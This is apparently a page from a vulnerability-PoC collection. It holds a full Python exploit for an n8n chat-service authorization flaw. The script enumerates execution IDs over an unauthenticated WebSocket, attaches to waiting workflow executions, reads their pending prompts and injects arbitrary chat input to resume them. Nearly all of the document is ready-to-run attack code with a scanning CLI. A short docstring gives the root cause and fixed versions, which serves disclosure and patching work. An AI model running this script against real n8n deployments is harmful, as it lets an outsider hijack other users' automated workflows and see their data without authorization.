5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_GHSA-f77h-j2v7-g6mw.py PY
#!/usr/bin/env python3
"""
PoC — CVE-2026-42228 / GHSA-f77h-j2v7-g6mw
Unauthenticated Chat Execution Hijacking in n8n

Affected : n8n < 1.123.32
Fixed in : n8n 1.123.32 / 2.17.4 / 2.18.1

Root cause
----------
chat-service.ts :: startSession() accepts executionId from the WebSocket
query string and only verifies the execution exists in the database.
It never checks whether the caller is authorised to access that execution.
An unauthenticated attacker who knows a valid executionId for a "waiting"
execution can attach to it, receive the pending prompt, and inject
arbitrary chat input that resumes the workflow.

Pre-requisites (per the advisory)
----------------------------------
1. A public Hosted Chat workflow with Authentication = None is active.
2. A target execution is currently in the "waiting" state.
3. The attacker can obtain / enumerate the numeric execution ID.

Usage
-----
  pip install websocket-client
  python3 poc.py --target http://n8n.example.com --start-id 1 --end-id 200
  python3 poc.py --target http://n8n.example.com --exec-id 42 --inject "PWNED"
"""

import argparse
import json
import sys
import time
import uuid
from urllib.parse import urlparse

try:
    import websocket
except ImportError:
    sys.exit("[!] Missing dependency: pip install websocket-client")

N8N_HEARTBEAT     = "n8n|heartbeat"
N8N_HEARTBEAT_ACK = "n8n|heartbeat-ack"
N8N_CONTINUE      = "n8n|continue"

BANNER = """
╔══════════════════════════════════════════════════════════════════╗
║  CVE-2026-42228 / GHSA-f77h-j2v7-g6mw — n8n Chat Hijack PoC    ║
║  Affected: n8n < 1.123.32   (tested on v1.123.22)               ║
╚══════════════════════════════════════════════════════════════════╝
"""


def ws_url(base: str, exec_id: int | str, session_id: str) -> str:
    """Build the WebSocket URL for a given execution ID."""
    parsed = urlparse(base)
    scheme = "wss" if parsed.scheme == "https" else "ws"
    host   = parsed.netloc
    return f"{scheme}://{host}/chat?sessionId={session_id}&executionId={exec_id}&isPublic=true"


def probe_execution(base_url: str, exec_id: int | str,
                    inject_msg: str | None = None,
                    timeout: float = 4.0) -> dict:
    """
    Connect to the /chat WebSocket as an unauthenticated attacker.

    Returns a dict:
      {
        "exec_id":   <int>,
        "status":    "waiting" | "not_found" | "not_waiting" | "error",
        "messages":  [<str>, ...],   # messages received from the server
        "hijacked":  bool,           # True if inject_msg was sent
      }
    """
    session_id = str(uuid.uuid4())
    url        = ws_url(base_url, exec_id, session_id)
    result     = {"exec_id": exec_id, "status": "not_found",
                  "messages": [], "hijacked": False}

    ws = None
    try:
        ws = websocket.create_connection(url, timeout=timeout,
                                         suppress_origin=True)

        deadline = time.time() + timeout

        while time.time() < deadline:
            ws.settimeout(max(0.1, deadline - time.time()))
            try:
                raw = ws.recv()
            except websocket.WebSocketTimeoutException:
                break

            result["messages"].append(raw)

            if raw == N8N_HEARTBEAT:
                ws.send(N8N_HEARTBEAT_ACK)
                continue

            # "Execution with id … does not exist"  → skip
            if "does not exist" in raw:
                result["status"] = "not_found"
                break

            if raw == N8N_CONTINUE:
                result["status"] = "waiting"
                continue

            # Any other message is the pending prompt from the workflow
            result["status"] = "waiting"

        # --- HIJACK: inject arbitrary chat input -------------------------
        if result["status"] == "waiting" and inject_msg is not None:
            payload = json.dumps({
                "action":    "sendMessage",
                "sessionId": session_id,
                "chatInput": inject_msg,
            })
            ws.send(payload)
            result["hijacked"] = True
            # Give the server a moment to process and respond
            ws.settimeout(3.0)
            try:
                while True:
                    extra = ws.recv()
                    result["messages"].append(extra)
            except Exception:
                pass
        # -----------------------------------------------------------------

    except websocket.WebSocketBadStatusException as exc:
        # 1008 = policy violation → execution not found / not waiting
        result["status"] = "not_found"
        result["messages"].append(str(exc))
    except Exception as exc:
        result["status"]  = "error"
        result["messages"].append(str(exc))
    finally:
        if ws:
            try:
                ws.close()
            except Exception:
                pass

    return result


def scan(base_url: str, start: int, end: int, inject: str | None) -> None:
    print(BANNER)
    print(f"[*] Target  : {base_url}")
    print(f"[*] Scanning execution IDs {start} → {end}")
    if inject:
        print(f"[*] Payload : {inject!r}")
    print()

    found = []
    for exec_id in range(start, end + 1):
        sys.stdout.write(f"\r[~] Probing exec_id={exec_id}   ")
        sys.stdout.flush()
        res = probe_execution(base_url, exec_id, inject_msg=inject, timeout=4.0)
        if res["status"] == "waiting":
            print(f"\n[+] WAITING execution found! exec_id={exec_id}")
            for m in res["messages"]:
                print(f"    Server said: {m!r}")
            if res["hijacked"]:
                print(f"    [!!!] Hijack payload sent: {inject!r}")
            found.append(exec_id)

    print()
    if found:
        print(f"[+] Vulnerable executions hijacked: {found}")
    else:
        print("[-] No waiting executions found in this range.")


def single(base_url: str, exec_id: int | str, inject: str) -> None:
    print(BANNER)
    print(f"[*] Target     : {base_url}")
    print(f"[*] Execution  : {exec_id}")
    print(f"[*] Payload    : {inject!r}")
    print()

    res = probe_execution(base_url, exec_id, inject_msg=inject, timeout=6.0)
    print(f"[*] Status  : {res['status']}")
    for m in res["messages"]:
        print(f"[*] Server  : {m!r}")
    if res["hijacked"]:
        print(f"\n[!!!] SUCCESS — payload injected into execution {exec_id}")
    else:
        print("\n[-] Execution was not in a hijackable state.")


def main():
    ap = argparse.ArgumentParser(
        description="PoC for CVE-2026-42228 — n8n unauthenticated chat hijack")
    ap.add_argument("--target",   required=True,
                    help="Base URL of the n8n instance  (e.g. http://n8n.example.com)")
    ap.add_argument("--exec-id",  type=str, default=None,
                    help="Attack a specific execution ID directly")
    ap.add_argument("--start-id", type=int, default=1,
                    help="Start of execution ID scan range (default: 1)")
    ap.add_argument("--end-id",   type=int, default=100,
                    help="End of execution ID scan range   (default: 100)")
    ap.add_argument("--inject",   default="[CVE-2026-42228] hijacked by PoC",
                    help="Chat message to inject into the waiting execution")
    args = ap.parse_args()

    if args.exec_id is not None:
        single(args.target, args.exec_id, args.inject)
    else:
        scan(args.target, args.start_id, args.end_id, args.inject)


if __name__ == "__main__":
    main()